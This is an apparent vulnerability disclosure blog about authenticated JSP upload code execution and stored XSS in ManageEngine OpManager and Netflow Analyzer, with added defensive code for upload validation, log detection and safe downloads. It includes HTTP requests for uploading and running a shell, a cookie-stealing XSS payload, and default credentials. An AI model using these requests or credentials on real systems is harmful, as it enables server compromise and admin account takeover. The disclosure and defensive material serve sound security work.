Vulnerability Discovered in ManageEngine Products

Perspective Risk Identifies Vulnerability in ManageEngine Products

Welcome to this technical blog by Perspective Risk's InfoSec specialist Sasha Raljic, covering vulnerabilities he recently discovered in ManageEngine products. Raljic responsibly disclosed the vulnerabilities to the vendor, who released a fix on the 25th of January; this write-up is therefore published 24 hours later.

Sasha Raljic Twitter: @RSasha512

Introduction to ManageEngine Products

OpManager and Netflow Analyzer are two products made and distributed by ManageEngine. According to their website three of every five Fortune 500 companies utilise one of the ManageEngine products to manage their infrastructure.

While the identified vulnerabilities could be present in other products as well, only OpManager and Netflow Analyzer were tested (as those are the two products I use on my home network). OpManager is used for network monitoring; however, it also has netflow analysis capability. Netflow Analyzer, on the other hand, only performs netflow analysis and provides users with network usage statistics. It is also able to detect various security violations, mainly different types of port scans.

Both products share the same code base and vulnerabilities found in one product were also found in the other. Both vulnerabilities are fairly trivial and given more time, I am sure other serious issues would also surface. It should also be noted that ManageEngine does not have a great reputation when it comes to security, evidenced by the number of CVEs assigned in the recent past.

Widespread Usage of ManageEngine Products

The list of companies that use ManageEngine products is extensive. Some of these companies and organisations include:

  • Barclays
  • SONY
  • Amazon
  • AT&T
  • Siemens
  • US Army Aviation & Missile Command
  • The United States Navy

I must point out that this list is taken from the ManageEngine website and as a result, I can’t comment on its accuracy. If this information is correct, any vulnerability discovered in any of the ManageEngine products (of which there are around 40) could have a serious impact on these organisations.

Multiple Vulnerabilities in ManageEngine OpManager and Netflow Analyzer

As stated, these issues were responsibly disclosed to ManageEngine and at the time of writing are fixed in version 12200. The vendor reacted promptly and patched the issues within a couple of days.

The issues arise from the way file uploads are handled by ManageEngine OpManager and Netflow Analyzer. Both standard and admin users can upload files in two specific locations (alarms and group chat), and in both cases the upload functionality accepts JSP files, which the server then executes when they are requested.

The ability to upload and execute arbitrary JSP files has a significant impact on the application and the underlying server: because the file-type filtering is poorly implemented, uploaded code runs on the server.
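The following is an added illustration of the kind of server-side check whose absence the write-up describes; it is example code written for this article, not ManageEngine's code and not the fix shipped in build 12200, whose details are not on this page. The extension allowlist, the storage-root layout and the helper names are assumptions. It rejects server-executable extensions in any position of the name, ignores any directory component the client supplies, and stores the file under a server-generated name in a directory assumed to sit outside the web application, so a stored file can never be requested as a URL and handed to the JSP engine.

```python
import secrets
import tempfile
from pathlib import Path

# Extensions a Java servlet container treats as server-side code. A user
# attachment (alarm note, chat upload) never legitimately needs any of these.
SERVER_EXECUTABLE_EXTS = {"jsp", "jspx", "jspf", "jsw", "jsv", "jhtml", "war", "jar", "class"}

# Assumed allowlist for attachments; a real deployment would tune this list.
ALLOWED_EXTS = {"png", "jpg", "jpeg", "gif", "pdf", "txt", "csv", "log"}


class UploadRejected(ValueError):
    """Raised when a client-supplied filename fails validation."""


def validate_upload_filename(filename: str) -> str:
    """Return the lower-cased extension to store the file under, or raise.

    Only the final path component is considered, every dot-separated suffix
    is checked against the executable list (so shell.jsp.png is caught), and
    the last suffix must be on the allowlist.
    """
    if not filename or "\x00" in filename:
        raise UploadRejected("empty filename or embedded NUL")
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].strip()
    if base in ("", ".", ".."):
        raise UploadRejected("no usable filename component")
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        raise UploadRejected("no extension")
    suffixes = [p for p in parts[1:] if p]
    if any(s in SERVER_EXECUTABLE_EXTS for s in suffixes):
        raise UploadRejected("server-executable extension present")
    ext = suffixes[-1]
    if ext not in ALLOWED_EXTS:
        raise UploadRejected(f"extension {ext!r} not allowed")
    return ext


def is_accepted(filename: str) -> bool:
    """Convenience wrapper: True if the filename passes validation."""
    try:
        validate_upload_filename(filename)
        return True
    except UploadRejected:
        return False


def store_upload(data: bytes, filename: str, storage_root: Path) -> Path:
    """Write the upload under storage_root with a server-generated name.

    storage_root is assumed to live outside the servlet container's web
    application directory; the application hands files out through a
    download handler rather than as static URLs. The client-supplied name
    is used only to choose the extension.
    """
    ext = validate_upload_filename(filename)
    root = storage_root.resolve()
    root.mkdir(parents=True, exist_ok=True)
    dest = (root / f"{secrets.token_hex(16)}.{ext}").resolve()
    if dest.parent != root:            # belt and braces: never leave the root
        raise UploadRejected("resolved path left the storage root")
    with open(dest, "xb") as fh:       # exclusive create: never overwrite
        fh.write(data)
    return dest


def make_temp_root() -> Path:
    """A throwaway storage root for the demo (constructed, not a real layout)."""
    return Path(tempfile.mkdtemp(prefix="uploads-"))


if __name__ == "__main__":
    for name in ("shell.jsp", "shell.jsp.png", "..\\..\\ROOT\\shell.JSP", "report.pdf"):
        print(f"{name!r:32} accepted={is_accepted(name)}")
    root = make_temp_root()
    print("stored at", store_upload(b"%PDF-1.4 constructed sample", "report.pdf", root))
```

The check is deliberately an allowlist: a denylist that only knows one spelling of `.jsp` is exactly the kind of filter that lets `shell.JSP` or `shell.jsp.png` through, depending on how the container maps extensions.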

Similarly, the ManageEngine cross-site scripting vulnerability discovered could also have a significant impact on application users. A successful attack could result in a compromise of the targeted user's account and, depending on other factors, could lead to access to other applications used by the user. Other typical attacks associated with the successful exploitation of cross-site scripting include keystroke logging, redirection of a user to malicious websites with the aim of compromising the user's machine, and credential harvesting through injected fake login pages.

The following table provides details of the environment used for testing, together with the default privileges under which the applications operate. Please note that default installations of the ManageEngine applications were used and no changes were made to the application post-installation.

Operating System         Software           Version   Build Number   Account Privileges Obtained
Windows 7 Professional   OpManager          12.0      12200          SYSTEM
                         Netflow Analyzer   12        12200          SYSTEM
Ubuntu Server 14.04      OpManager          12.0      12200          ROOT
                         Netflow Analyzer   12        12200          ROOT

File Upload Vulnerabilities

Uploading a JSP Shell via ALARMS Upload Functionality – Standard User

The following requests, made as both standard and admin users, triggered the vulnerability. Screenshots are shown for additional information.

It should be noted that HTTP requests initiated by the standard user are identical to HTTP requests initiated by the admin user. As a result, only one request has been provided. Furthermore, requests issued to Netflow Analyzer and OpManager were identical, as they are based on the same code. As a result, any API call issued by OpManager can be found in Netflow Analyzer as well.

POST /api/json/dashboard/addPost?apiKey=f5d6d9518fa3a9dd06bceaa8d65c94db&groupID=0&entityID=2&entityType=alarm HTTP/1.1
Host: localhost:7070
Content-Length: 1095
Accept: */*
Origin: http://localhost:7070
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
OPMCurrentRoute: http%3A%2F%2Flocalhost%3A7070%2Fapiclient%2Fember%2Findex.jsp%23%2FAlarms%2FAlarm%2FDetails%2F172.16.0.237_Poll
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydhd36goiFvJxUOtm
Referer: http://localhost:7070/apiclient/ember/index.jsp
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: f2RedirectUrl=null; encryptPassForAutomaticSignin=zANc8X8; userNameForAutomaticSignin=test@test.com; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; JSESSIONID=A4DE70D37728748E02F4D7E5D52E7663; NFA__SSO=20DA75BDC54DF2A1A4D3DDF116D73FBA
Connection: close

------WebKitFormBoundarydhd36goiFvJxUOtm
Content-Disposition: form-data; name="post"

shell_upload_as_standard_user
------WebKitFormBoundarydhd36goiFvJxUOtm
Content-Disposition: form-data; name="[object HTMLInputElement]i"; filename="shell.jsp"
Content-Type: application/octet-stream

<<<<Insert JSP Shell>>>>

------WebKitFormBoundarydhd36goiFvJxUOtm--

Shell Execution

Once the file upload is complete, the uploaded JSP shell is served from the following location and executes on request:

GET /itplus/FileStorage/314/shell.jsp?cmd=whoami HTTP/1.1
Host: localhost:7070
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://localhost:7070/itplus/FileStorage/314/shell.jsp
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8
Cookie: f2RedirectUrl=null; encryptPassForAutomaticSignin=zANc8X8; userNameForAutomaticSignin=test@test.com; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; JSESSIONID=A4DE70D37728748E02F4D7E5D52E7663; NFA__SSO=20DA75BDC54DF2A1A4D3DDF116D73FBA
Connection: close

Uploading a JSP Shell via CHAT Upload Functionality – Standard User

Similarly, the same issue exists in the Chat Upload feature:

POST /api/json/dashboard/addPost?apiKey=f5d6d9518fa3a9dd06bceaa8d65c94db&groupID=0 HTTP/1.1
Host: localhost:7070
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
OPMCurrentRoute: http%3A%2F%2Flocalhost%3A7070%2Fapiclient%2Fember%2Findex.jsp%23%2FITPlus
X-Requested-With: XMLHttpRequest
Referer: http://localhost:7070/apiclient/ember/index.jsp
Content-Length: 1094
Content-Type: multipart/form-data; boundary=---------------------------3052928669907
Cookie: JSESSIONID=092E669EA8E259987E4E45F400F679C8; f2RedirectUrl=null; domainNameForAutomaticSignin=Authenticator; authrule_name=Authenticator; encryptPassForAutomaticSignin=zAJV4C9; userNameForAutomaticSignin=test@test.com; signInAutomatically=true; NFA__SSO=DC2FD98823246FF053E1A2E71A0B4EE5
Connection: close

-----------------------------3052928669907
Content-Disposition: form-data; name="post"

shell_as_standard_user
-----------------------------3052928669907
Content-Disposition: form-data; name="[object HTMLInputElement]i"; filename="shell.jsp"
Content-Type: application/octet-stream

<<<<Insert JSP Shell>>>>

-----------------------------3052928669907--

Shell Execution

Once again command execution can be performed via the following:

GET /itplus/FileStorage/2/shell.jsp?cmd=whoami HTTP/1.1
Host: localhost:7070
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:7070/itplus/FileStorage/2/shell.jsp
Cookie: JSESSIONID=F2E96460C6D4956CFC7893791AE253A3; f2RedirectUrl=null; domainNameForAutomaticSignin=Authenticator; authrule_name=Authenticator; encryptPassForAutomaticSignin=d7963B4t; userNameForAutomaticSignin=admin; signInAutomatically=true; NFA__SSO=8E16089CBAD535B56272434E0B3331F7
Connection: close
Upgrade-Insecure-Requests: 1

The “whoami” command reveals that both OpManager and Netflow Analyzer run with SYSTEM privileges on Windows and Root privileges on Linux. As a result, a successful compromise would grant malicious attackers access to a privileged account which could be used to further enumerate the underlying host.
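For defenders, the requests above leave a clear trace in the servlet container's access log: a POST to one of the two upload endpoints followed by a GET for a `.jsp` under `/itplus/FileStorage/`, the path the write-up shows stored uploads being served from. The following detection is an added example written for this article, not a ManageEngine or Perspective Risk tool. It assumes the common log format that Tomcat's AccessLogValve writes by default; the log lines it scans are constructed for the demo, and the apiKey value in them is a placeholder.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Upload endpoints and the storage path from the write-up (lower-cased for matching).
UPLOAD_ENDPOINTS = {"/api/json/dashboard/addpost", "/api/json/maps/extractgmap"}
STORAGE_PREFIX = "/itplus/filestorage/"
EXEC_SUFFIXES = (".jsp", ".jspx")

# Assumed layout: Tomcat's default "common" access-log pattern, %h %l %u %t "%r" %s %b.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)


def classify(line: str):
    """Return an alert dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, target, status = m["method"], m["target"], int(m["status"])
    url = urlsplit(target)
    path = url.path.lower()
    params = parse_qs(url.query)
    if path.startswith(STORAGE_PREFIX) and path.endswith(EXEC_SUFFIXES):
        # A server-executable file under the upload store should never exist.
        # A 200 with a command-style parameter means it ran, not merely existed.
        sev = "high" if ("cmd" in params and status == 200) else "medium"
        return {"severity": sev, "ip": m["ip"], "ts": m["ts"], "path": url.path,
                "reason": "executable file requested from upload storage"}
    if method == "POST" and path in UPLOAD_ENDPOINTS:
        # Not an attack on its own, but the precursor to correlate the above with.
        return {"severity": "info", "ip": m["ip"], "ts": m["ts"], "path": url.path,
                "reason": "attachment upload endpoint used"}
    return None


def scan(lines):
    """Run classify over every line and keep the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit is not None]


def severity_counts(lines):
    """Summary by severity, handy for a dashboard or a test."""
    counts = {"high": 0, "medium": 0, "info": 0}
    for hit in scan(lines):
        counts[hit["severity"]] += 1
    return counts


# Constructed sample log; apiKey is a placeholder, not a real key.
SAMPLE_LOG = [
    '127.0.0.1 - - [25/Jan/2017:10:02:11 +0000] "POST /api/json/dashboard/addPost?apiKey=PLACEHOLDER&groupID=0&entityID=2&entityType=alarm HTTP/1.1" 200 57',
    '127.0.0.1 - - [25/Jan/2017:10:02:19 +0000] "GET /itplus/FileStorage/314/shell.jsp?cmd=whoami HTTP/1.1" 200 41',
    '10.0.0.5 - - [25/Jan/2017:10:05:00 +0000] "GET /itplus/FileStorage/2/notes.txt HTTP/1.1" 200 1200',
    '10.0.0.5 - - [25/Jan/2017:10:06:00 +0000] "GET /apiclient/ember/index.jsp HTTP/1.1" 200 8800',
    '10.0.0.7 - - [25/Jan/2017:10:07:00 +0000] "GET /itplus/FileStorage/9/a.JSPX HTTP/1.1" 404 -',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["severity"]:6} {hit["ts"]} {hit["ip"]:12} {hit["path"]}  ({hit["reason"]})')
```

The medium-severity rule fires even on a 404, because a request for a `.jsp` under the upload store is worth a look whether or not the file was there yet; the high-severity rule is the combination the write-up demonstrates (a 200 plus a `cmd` parameter). Correlating an `info` hit with a later `high` hit from the same source address gives the full upload-then-execute sequence.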

Persistent Cross-Site Scripting Vulnerability

In addition to the aforementioned code execution vulnerability, it is also possible to upload persistent cross-site scripting payloads using a standard user account.

The payload is rendered when an application admin logs in. As a result, standard users could target administrative users and perform account takeover attacks.

Furthermore, by combining this issue with a previously identified vulnerability relating to the storage of usernames and passwords in session cookie values, it would be possible to retrieve the admin user's password.

Further details of the previously discovered weak password obfuscation vulnerability can be found on SecurityFocus (1).

A proof-of-concept request, in which an HTML file containing JavaScript is uploaded to the application, is provided below:

POST /api/json/maps/extractGMap?apiKey=f5d6d9518fa3a9dd06bceaa8d65c94db HTTP/1.1
Host: localhost:7070
Content-Length: 267
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost:7070
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
OPMCurrentRoute: http%3A%2F%2Flocalhost%3A7070%2Fapiclient%2Fember%2Findex.jsp%23%2FEndUser%2FList
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj4RahZrYpCEYZ8Gq
Referer: http://localhost:7070/apiclient/ember/index.jsp
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: f2RedirectUrl=null; encryptPassForAutomaticSignin=zANc8X8; userNameForAutomaticSignin=test@test.com; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; JSESSIONID=7A9DB2DB93AABC58367F9DECF3A1ACE4; NFA__SSO=403DE7565532C8C8FBC0421722902918
Connection: close

------WebKitFormBoundaryj4RahZrYpCEYZ8Gq
Content-Disposition: form-data; name="file"; filename="xss_mouseover.html"
Content-Type: text/html

<html>
<body>
<a onmouseover=alert(document.cookie)>xss</a>
</body>
</html>

------WebKitFormBoundaryj4RahZrYpCEYZ8Gq--

Once an admin user logs in, the JavaScript executes and in this case the session token is displayed:

As the cookie values show, the session cookies store the username and the password. While the password is encrypted, this encryption method was found to be easily reversible. A Python script exists on GitHub (2) that can reverse this obfuscation method.
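The stored XSS above works because an uploaded HTML file is later handed back to the admin's browser and rendered in the application's own origin. A download handler that never trusts the stored file is the usual defence, and it also covers attachments uploaded before a fix was applied. The following is an added example written for this article, not ManageEngine's handler; the content-type allowlist, the magic-byte table and the markup heuristic are assumptions, and the sample file contents are constructed (the HTML one is the payload shown in the request above).

```python
import re

# Content types a stored attachment may be served as, keyed by the extension
# chosen at upload time. Anything else goes out as an opaque download.
SAFE_CONTENT_TYPES = {
    "png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg", "gif": "image/gif",
    "pdf": "application/pdf", "txt": "text/plain", "csv": "text/csv", "log": "text/plain",
}

# Leading bytes for the binary types, so a file named .png that holds HTML is caught.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",), "jpg": (b"\xff\xd8\xff",), "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"), "pdf": (b"%PDF-",),
}

# Heuristic for "a browser would treat this as markup": document/script tags or an
# element carrying an on*= event handler, as in the write-up's onmouseover payload.
HTML_MARKERS = re.compile(
    rb"<\s*(!doctype\s+html|html|script|svg|body|[a-z]+\s+[^>]*\bon\w+\s*=)", re.IGNORECASE
)


def looks_like_markup(data: bytes) -> bool:
    """True if the first 512 non-blank bytes contain something a browser would render."""
    return HTML_MARKERS.search(data.lstrip()[:512]) is not None


def content_matches_extension(ext: str, data: bytes) -> bool:
    """Binary types must start with their signature; text types must not be markup."""
    sigs = MAGIC.get(ext.lower())
    if sigs is None:
        return not looks_like_markup(data)
    return any(data.startswith(s) for s in sigs)


def download_headers(stored_ext: str, original_name: str, data: bytes) -> dict:
    """Response headers for handing a stored attachment back to a browser.

    Raises ValueError if the stored bytes do not match the extension. The
    headers force a download, forbid MIME sniffing and, should the response
    ever be rendered anyway, sandbox it away from the application's origin.
    """
    ext = stored_ext.lower()
    if not content_matches_extension(ext, data):
        raise ValueError("stored content does not match its extension")
    ctype = SAFE_CONTENT_TYPES.get(ext, "application/octet-stream")
    # Keep the filename parameter to a safe character set; quotes and controls go.
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", original_name)[:100] or "download"
    return {
        "Content-Type": ctype,
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
        "Cache-Control": "no-store",
    }


# Constructed samples: the page's XSS upload and a minimal PNG header.
XSS_UPLOAD = b"<html>\n<body>\n<a onmouseover=alert(document.cookie)>xss</a>\n</body>\n</html>\n"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8

if __name__ == "__main__":
    for ext, data in (("png", PNG_SAMPLE), ("txt", b"plain alarm notes\n"), ("png", XSS_UPLOAD), ("html", XSS_UPLOAD)):
        try:
            print(ext, "->", download_headers(ext, "attachment." + ext, data)["Content-Type"])
        except ValueError as err:
            print(ext, "-> refused:", err)
```

With `attachment` plus `nosniff`, even a file that does slip through is downloaded rather than rendered, so the `onmouseover` handler in the request above never runs inside the application's origin. Independently of the upload path, marking the session cookie `HttpOnly` removes `document.cookie` as a target for any script that does execute.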

Ease of Exploit

These vulnerabilities require malicious attackers to be already authenticated to the vulnerable applications. This can be achieved by either using default admin credentials (admin:admin) or by using a trialuserlogin account that is automatically created during the installation process.

This trialuserlogin account (trialuserlogin:trialuserlogin) also has administrative privileges. It should be noted that admin privileges are not required to exploit this issue. A standard user account is able to access vulnerable sections of the applications which can then be exploited to retrieve admin credentials or execute arbitrary code on the underlying host.

References

  1. SecurityFocus (2016, August). Multiple Vulnerabilities in WebNMS Framework. Retrieved from SecurityFocus.
  2. denandz (2016, January). OpManager-Decrypter. Retrieved from GitHub.
